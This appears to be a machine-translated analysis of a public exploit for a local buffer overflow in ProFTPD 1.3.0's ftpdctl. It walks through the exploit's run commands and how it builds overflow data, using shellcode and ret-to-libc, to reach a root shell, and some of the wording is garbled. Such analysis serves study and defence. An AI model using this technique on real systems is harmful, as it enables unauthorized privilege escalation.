Analysis of ProFTPdLocalpr_ctrls_connectVulnerability-ftpdctl vulnerability and attack code

Analysis of ProFTPdLocalpr_ctrls_connectVulnerability-ftpdctl vulnerability and attack code

Attack code URL: http://www.exploit-db.com/exploits/394/

1. Running environment:
1. ProFTPD 1.3.0/1.3.0a
2. When compiling ProFTPD, The -- enable-ctrls option must be enabled.
./Configure -- enable-ctrls
2. running parameters:
Root @ kali :~ # Gcc 394.c-o 394
Root @ kali :~ #./394-s <option> [-p <option_path>] [-o <option_offset>]
The value after-s is two different attack methods. values 1 and 2 can be selected. 1st ways to use the current environment, 2nd ways to use ret-to-libc.
Note: In the return-to-libc attack, the return address in its stack is replaced with the address of another instruction, and part of the stack is overwritten to provide its parameters. This allows attackers to call existing functions without injecting malicious code into the program.
Parameter-o parameter-p is meaningless. It only helps to use the attack code.
3. Code Analysis
The code execution command is root @ kali :~ # ../394-s 1
3.1 analysis program parameters

The second line of the program is to analyze the parameters when the 236th. c program is running. Getopt (int argc, char * const argv [], const char * optstring) is used to analyze command line parameters. The argc and argv parameters are the number and content of parameters passed by main. The optstring parameter indicates the option string to be processed. The letter in the option string followed by the colon ":", indicating that there are related parameters. The global variable optarg points to this additional parameter. Next, we will process different parameters. Because only-s is used in the end, we will focus on the analysis of-s parameters.
After the-s parameter is processed by getopt, because the colon ":" exists in optstring, optarg points to the next parameter of-s, that is, 1. Then, the program assigns the parameter value to the variable wybor in line 246, waiting for the next step.

3.2 determine the validity of parameters
Because 394. the c program only provides two types of vulnerability attacks. Therefore, in the program, the parameter values after-s are limited to 1 or 2, and any other values are considered invalid, will cause the program to exit directly.

In addition, the path variable in the program is used to specify the absolute path of the vulnerability program. The default value is/usr/local/bin/ftpdctl. The pr_ctrls_connect () function in ctrls. c is called in the ftpdctl of the ProFTPD server, and a strncpy () in this function is the buffer overflow point of this vulnerability. In row 394 of 267. c, use fopen () to open the file to check whether the file in the path is valid.

3.3 construct overflow data and perform attacks
The final attack statement is execle (path, path, "-s", buf, 0, sh) of rows 298 and 324 );
Int execle (const char * path, const char * arg,..., char * const envp []);
You can use the execle function to replace the current process with a new process. The path parameter indicates the name of the program to be started, including the path name, And the arg parameter indicates the parameter included in the program to be started, generally, the first parameter is the name of the command to be executed. Pass environment variables to the process envp to be replaced to save the environment information data
The variable buf is used to store overflow data. In addition to a large amount of meaningless data, the most important thing is the entry address with/bin/sh. When the buffer overflow occurs, the program will be directed to/bin/sh to execute arbitrary commands.
Constructing overflow data mainly involves two variables: buf [229] AND sh [2]. Because the parameters (1 or 2) After-s determine the two methods to exploit the vulnerability, the following two methods are described separately:
When method 1 is wybor = 1, except the first two bytes of data "/A" in the buf, the other 227 bytes are all the entry addresses of/bin/sh ,.

Envp [] uses 0x90 as the padding character and writes the shellcode constructed in advance at the end. Shellcode is mainly used for execution: setuid (0), setgid (0),/bin/sh, and exit (0 ).

When method 2 is wybor = 2, because the ret-to-libc method is used, the data in the buf except that the first byte is '/', the last three bytes are respectively the LIBC_SYSTEM address, the LIBC_NEXT _ address, and the/BIN/SH address. The remaining 225 bytes are all filled with characters 0x41.

Envp [] uses ''' as the filling character and writes the string "/bin/sh" at the end ".
Vulnerability attacks. This is because, in the Command ftpdctl, you need to establish a local socket connection with the server to communicate between processes. When establishing a socket connection, ftpdctl. c called in ctrls. the pr_ctrls_connect (char * socket_file) function defined in Row 3 in c ).
Pr_ctrls_connect (char * socket_file) is mainly used to create a stream socket of the AF_UNIX type and connect it to the server. The local socket address used for connection is ctrl_sock. Ctrl_sock is a struct sockaddr_un structure. It has two parameters: sun_family and sun_path. Sun_family is a protocol family and assigned a value of AF_UNIX for communication between local processes. Sun_path is the path of the local file. In the program, socket_file is used to assign values to sun_path. Unfortunately, when assigning values, strncpy () without checking the data boundary is used. We can see that the function written to the memory in row 923 of the program is strncpy (ctrl_sock.sun_path, socket_file, strlen (socket_file), it is clear that this function does not perform a boundary check on the written data, that is, any length of data can be written to the memory area of sizeof (ctrl_sock. Ctrl_sock is a local variable defined in the pr_ctrls_connect () function. When a function is called, the computer will open up a memory storage area with a size of sizeof (ctrl_sock) in the dynamic storage area, at the same time, the dynamic storage area is also used to save the field information and function return address when the function is called, which creates conditions for the buffer overflow attack. As mentioned in the 394. c source code comment, we can control the length of socket_file to overflow the buffer.
Indeed, 394. c uses this vulnerability to construct ultra-long data containing the/bin/sh return address. When ftpdctrl is called, the parameter-s is used to replace the normal socket_file path. When ctrls. c executes strncpy (), this ultra-long shellcode overflows the buffer and forwards it to/bin/sh for attack purpose.